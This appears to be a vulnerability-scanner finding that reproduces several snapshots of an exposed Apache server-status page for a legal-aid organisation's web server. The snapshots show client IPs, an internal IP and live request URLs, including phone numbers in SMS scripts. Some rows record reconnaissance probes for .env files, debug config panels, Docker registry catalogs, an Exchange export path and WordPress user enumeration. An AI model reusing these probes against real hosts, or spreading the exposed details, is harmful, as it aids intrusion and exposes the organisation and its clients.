::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-197-0/0/1644. 0.0016236500.00.0028.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-197-0/0/2746. 0.0016236400.00.0035.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-197-0/0/2474. 0.0016236300.00.0025.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-197-0/0/2644. 0.0016236200.00.0033.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-197-0/0/1389. 0.9016235800.00.0018.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-197-0/0/1619. 0.3716236100.00.0022.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-197-0/0/1664. 0.0016242500.00.0021.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-197-0/0/1264. 0.0016242400.00.0025.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-197-0/0/1228. 0.0016242300
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021a4e263da
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 06-Nov-2023 00:53:10 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 199 Parent Server MPM Generation: 198 Server uptime: 198 days 9 hours 9 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 3382583 - Total Traffic: 46.2 GB CPU Usage: u146.22 s17.06 cu0 cs0 - .000953% CPU load .197 requests/sec - 2895 B/second - 14.3 kB/request 2 requests currently being processed, 8 idle workers _._............_.........KW____......._......................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-19882550/40/246644_ 0.99252410.00.213416.31 130.176.137.97http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1699231960.352792024612426 1-198-0/0/240685. 0.0485400.00.003458.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-19882610/38/229689_ 1.7811800.00.223369.06 130.176.137.97http/1.1gwinnettfamilylawclinic.org:808GET /favicon.ico HTTP/1.1 3-198-0/0/229178. 0.2185500.00.003193.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-198-0/0/223470. 3.0784900.00.003117.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-198-0/0/214437. 0.0884800.00.003018.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-198-0/0/203904. 0.0085000.00.002995.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-198-0/0/204871. 0.0084600.00.002856.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-198-0/0/186749. 0.2385100.00.002865.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-198-0/0/183480. 1.8185200.00.002341.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-198-0/0/162948. 0.0184700.00.002345.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-198-0/0/137498. 0.6585300.00.002034.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-198-0/0/132535. 1.2285600.00.001793.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-198-0/0/96272. 0.0084500.00.001292.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-198-0/0/82462. 0.0084400.00.001045.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-19887470/5/84323_ 0.83247540.00.201089.59 18.68.45.183http/1.1atlantalegalaid.org:8080GET /see-all-news/item/254-tentative-sports-calendar-2020-21 HT 16-198-0/0/69016. 0.0084300.00.00940.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-198-0/0/39007. 0.0084200.00.00532.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-198-0/0/31382. 0.0084100.00.00406.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-198-0/0/29816. 0.0083800.00.00446.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-198-0/0/26633. 0.0083900.00.00384.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-198-0/0/25343. 0.0084000.00.00410.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-198-0/0/25079. 0.0083700.00.00334.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-198-0/0/25249. 0.0083600.00.00345.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-198-0/0/23114. 0.0083500.00.00262.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-19888015/9/11669K 0.08005.20.02195.26 70.132.1.81http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 26-19888022/6/10102W 0.08002.10.01170.19 70.132.1.81http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-19888070/5/11838_ 0.081100.00.06162.56 130.176.137.71http/1.1gwinnettfamilylawclinic.org:808GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1 28-19888120/5/10939_ 0.1682490.00.06127.78 130.176.137.97http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 29-19888170/4/8408_ 0.668014030.00.01126.26 130.176.218.168http/1.1events.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 30-19888220/4/9008_ 0.62816950.00.10130.48 130.176.137.97http/1.1events.atlantalegalaid.org:8080POST /wp-cron.php?doing_wp_cron=1699231903.67476296424865722656 31-198-0/0/8907. 0.0086500.00.00121.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-198-0/0/10847. 0.0086400.00.00136.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-198-0/0/8504. 0.0086300.00.00141.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-198-0/0/8561. 0.0086200.00.00105.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-198-0/0/7623. 0.0086100.00.00102.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-198-0/0/7909. 0.0086000.00.00122.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-198-0/0/10786. 0.0085900.00.00128.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-19888580/4/8187_ 0.381200.00.2296.41 64.252.69.198http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2015/12/Motion-to-Transfer-Venue.pdf HT 39-198-0/0/8418. 0.0085800.00.00118.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-198-0/0/6902. 0.0085700.00.0076.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-198-0/0/3932. 3.305730200.00.0038.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-198-0/0/4361. 0.006365300.00.0048.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-198-0/0/4029. 0.006365400.00.0028.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-197-0/0/1601. 0.0015057800.00.0017.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-197-0/0/2488. 0.0015058000.00.0032.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-197-0/0/1739. 0.0015056700.00.0015.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-197-0/0/1644. 0.0015056600.00.0028.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-197-0/0/2746. 0.0015056500.00.0035.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-197-0/0/2474. 0.0015056400.00.0025.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-197-0/0/2644. 0.0015056300.00.0033.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-197-0/0/1389. 0.9015055900.00.0018.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-197-0/0/1619. 0.3715056200.00.0022.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-197-0/0/1664. 0.0015062500.00.0021.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-197-0/0/1264. 0.0015062400.00.0025.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-197-0/0/1228. 0.0015062300.00.0012.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-197-0/0/1957. 0.00150622
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02126785651
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 26-Oct-2023 16:05:41 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 189 Parent Server MPM Generation: 188 Server uptime: 188 days 21 minutes 43 seconds Server load: 0.18 0.06 0.01 Total accesses: 3139650 - Total Traffic: 43.7 GB CPU Usage: u126.03 s16.93 cu.09 cs.08 - .000881% CPU load .193 requests/sec - 2891 B/second - 14.6 kB/request 11 requests currently being processed, 0 idle workers KWKWKK.W.KKKK................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-188115311/15/228156K 3.53001.00.093238.47 70.132.1.81http/1.1on.alas.org:8080GET / HTTP/1.1 1-188110484/37/223566W 11.81004.20.723280.36 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 2-188110644/34/211962K 11.29004.10.833174.73 15.158.40.169http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 3-188116331/22/211571W 2.26000.90.192990.51 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-188116386/12/206837K 3.100037.40.252942.38 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-188116891/1/199044K 0.00001.10.002852.89 15.158.40.169http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 6-188-0/0/189479. 2.2645900.00.002825.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-188116390/12/191695W 1.52100.00.292715.70 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 8-188-0/0/173111. 2.9445400.00.002723.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-188116111/14/170913K 3.8603651.37.832212.01 130.176.137.97http/1.1events.alas.org:8080POST /wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&no 10-188110045/43/151075K 2.39005.78.502219.12 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 11-188112155/33/127782K 7.060141.10.541932.72 15.158.40.169http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 12-188108121/43/124652K 7.7307891.00.631709.02 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1698336340.95940208435058593750 13-188-0/0/89673. 0.00198500.00.001217.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-188-0/0/76275. 0.00198300.00.00983.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-188-0/0/76493. 0.56469400.00.001027.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-188-0/0/63947. 0.00469900.00.00890.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-188-0/0/37502. 3.36317300.00.00517.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-188-0/0/29583. 0.00469800.00.00389.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-188-0/0/25767. 0.00470000.00.00412.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-188-0/0/25291. 0.00469700.00.00363.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-188-0/0/23405. 0.00469600.00.00379.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-188-0/0/23942. 6.80471300.00.00323.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-188-0/0/23865. 0.00469500.00.00333.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-188-0/0/21399. 5.77214900.00.00242.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-188-0/0/10775. 1.99398800.00.00183.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-188-0/0/9731. 0.00469200.00.00167.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-188-0/0/11027. 0.00469100.00.00152.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-188-0/0/8303. 0.00469000.00.00117.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-188-0/0/8081. 0.00468900.00.00123.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-188-0/0/8226. 0.00468800.00.00125.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-188-0/0/8185. 0.00469300.00.00112.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-188-0/0/9392. 7.16246000.00.00129.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-188-0/0/7961. 0.00468600.00.00128.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-188-0/0/7868. 0.00468700.00.0093.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-188-0/0/7228. 0.00468400.00.00100.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-188-0/0/7490. 1.34399100.00.00118.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-188-0/0/10355. 2.13391400.00.00123.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-188-0/0/7622. 0.00468500.00.0090.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-188-0/0/8122. 5.73198200.00.00116.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-188-0/0/6636. 0.91391300.00.0073.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-187-0/0/3822. 0.006446000.00.0036.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-187-0/0/4216. 0.006445900.00.0046.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-187-0/0/4000. 0.006445800.00.0028.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-187-0/0/1508. 0.006445700.00.0015.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-187-0/0/2386. 0.006445400.00.0031.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-187-0/0/1672. 0.006445600.00.0014.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-187-0/0/1625. 0.006445500.00.0028.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-187-0/0/2615. 0.006445300.00.0033.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-187-0/0/2455. 0.006445200.00.0024.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-187-0/0/2558. 0.006445100.00.0031.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-187-0/0/1314. 0.006445000.00.0017.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-187-0/0/1498. 0.006444900.00.0020.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-187-0/0/1626. 0.006444800.00.0021.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-187-0/0/1141. 0.006444700.00.0023.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-187-0/0/1176. 0.006444600.00.0012.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-187-0/0/1868. 0.0064445
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0219e35fc0a
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 26-Oct-2023 16:01:05 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 189 Parent Server MPM Generation: 188 Server uptime: 188 days 17 minutes 6 seconds Server load: 0.02 0.05 0.01 Total accesses: 3139589 - Total Traffic: 43.7 GB CPU Usage: u126.06 s16.86 cu.08 cs.07 - .000881% CPU load .193 requests/sec - 2891 B/second - 14.6 kB/request 3 requests currently being processed, 7 idle workers K__K_.._._W__................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-188115311/12/228153K 2.85411.60.083238.46 130.176.137.97http/1.1code.atlantalegalaid.org:8080GET /surveys/sendsms/call_them.php?number=404-977-2223&AccountS 1-188110480/31/223560_ 11.27842070.00.703280.34 130.176.106.131http/1.1intranet.alas.org:8080POST /wp-json/contact-form-7/v1/contact-forms/1889/feedback HTT 2-188110640/28/211956_ 11.26509920.00.813174.71 18.68.45.183http/1.1atlantalegalaid.org:8080GET /sea-of-thieves-how-to-do-the-mysteries-of-the-sunken-kingd 3-188116334/14/211563K 1.64104.20.162990.48 70.132.1.81http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 4-188116380/4/206829_ 2.1965820.00.202942.33 64.252.67.183http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2018/05/Legitimation-UNCONTESTED.pdf HT 5-188-0/0/199043. 5.5418100.00.002852.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-188-0/0/189479. 2.2618300.00.002825.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-188116390/10/191693_ 0.87107550.00.112715.52 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 8-188-0/0/173111. 2.9417800.00.002723.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-188116110/10/170909_ 3.62832790.07.742211.92 130.176.137.97http/1.1code.atlantalegalaid.org:8080GET /surveys/sendsms/clickcall.php?cf7s-number=9127779283&cf7s- 10-188110043/32/151064W 2.34003.28.472219.08 70.132.1.81http/1.1short.alas.org:8080GET /server-status HTTP/1.1 11-188112150/24/127773_ 5.53521990.00.481932.67 18.68.45.183http/1.1gwinnettfamilylawclinic.org:808GET /about/?cc=us HTTP/1.1 12-188108120/40/124649_ 7.3876870.00.591708.98 130.176.106.131http/1.1intranet.alas.org:8080GET /wp-json/contact-form-7/v1/contact-forms/1889/refill HTTP/1 13-188-0/0/89673. 0.00170800.00.001217.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-188-0/0/76275. 0.00170600.00.00983.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-188-0/0/76493. 0.56441700.00.001027.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-188-0/0/63947. 0.00442200.00.00890.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-188-0/0/37502. 3.36289700.00.00517.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-188-0/0/29583. 0.00442100.00.00389.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-188-0/0/25767. 0.00442300.00.00412.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-188-0/0/25291. 0.00442000.00.00363.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-188-0/0/23405. 0.00441900.00.00379.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-188-0/0/23942. 6.80443600.00.00323.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-188-0/0/23865. 0.00441800.00.00333.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-188-0/0/21399. 5.77187300.00.00242.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-188-0/0/10775. 1.99371200.00.00183.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-188-0/0/9731. 0.00441500.00.00167.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-188-0/0/11027. 0.00441400.00.00152.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-188-0/0/8303. 0.00441300.00.00117.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-188-0/0/8081. 0.00441200.00.00123.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-188-0/0/8226. 0.00441100.00.00125.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-188-0/0/8185. 0.00441600.00.00112.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-188-0/0/9392. 7.16218300.00.00129.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-188-0/0/7961. 0.00440900.00.00128.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-188-0/0/7868. 0.00441000.00.0093.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-188-0/0/7228. 0.00440700.00.00100.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-188-0/0/7490. 1.34371500.00.00118.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-188-0/0/10355. 2.13363700.00.00123.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-188-0/0/7622. 0.00440800.00.0090.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-188-0/0/8122. 5.73170500.00.00116.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-188-0/0/6636. 0.91363600.00.0073.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-187-0/0/3822. 0.006418400.00.0036.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-187-0/0/4216. 0.006418300.00.0046.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-187-0/0/4000. 0.006418200.00.0028.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-187-0/0/1508. 0.006418100.00.0015.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-187-0/0/2386. 0.006417800.00.0031.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-187-0/0/1672. 0.006418000.00.0014.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-187-0/0/1625. 0.006417900.00.0028.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-187-0/0/2615. 0.006417700.00.0033.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-187-0/0/2455. 0.006417600.00.0024.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-187-0/0/2558. 0.006417500.00.0031.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-187-0/0/1314. 0.006417400.00.0017.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-187-0/0/1498. 0.006417300.00.0020.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-187-0/0/1626. 0.006417200.00.0021.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-187-0/0/1141. 0.006417100.00.0023.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-187-0/0/1176. 0.006417000.00.0012.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02103241a26
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:18 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 20 seconds Server load: 2.63 0.57 0.18 Total accesses: 2869740 - Total Traffic: 40.6 GB CPU Usage: u50.16 s8.9 cu0 cs0 - .000394% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 107 requests currently being processed, 30 idle workers KWWKKWKWW_WKWKK_KWWWWKKKKKKKWKWKWKKWKKWKK_KWKKWWKKWWKKWK_KKWWKWK KKKKKWKKKWWWKKKKWWKKKKKKWKWKWKKKKWWKKKWKKKKK_KWK________________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-173282749/9/207942K 0.630121.00.023020.18 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 1-173280084/28/202806W 1.6830235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0830277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823811/14/192750K 1.400089.40.092785.50 15.158.40.169http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 4-173281676/17/189270K 2.140012.80.532738.83 15.158.40.169http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 5-173271296/89/182603W 6.613047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977K 1.86067238.70.242649.58 15.158.40.169http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 7-1732803510/28/175017W 1.3000282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7600275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45027930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281683/15/138954W 2.400035.40.242080.48 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 11-173282807/7/119543K 0.130049.30.051807.13 15.158.40.169http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-1732769710/55/114559W 3.000059.70.651606.25 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 13-173282897/7/83328K 0.090047.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 14-173282902/4/70269K 1.38002.30.32922.44 15.158.40.167http/1.1secure.alas.org:8080GET /.env HTTP/1.1 15-173282950/3/71095_ 0.56026040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282966/6/58181K 0.10095311.90.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 17-173283094/4/33836W 0.320040.30.04465.86 15.158.40.169http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 18-173283105/5/24064W 0.100045.50.04337.93 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 19-173283161/1/23457W 0.00401.40.00388.61 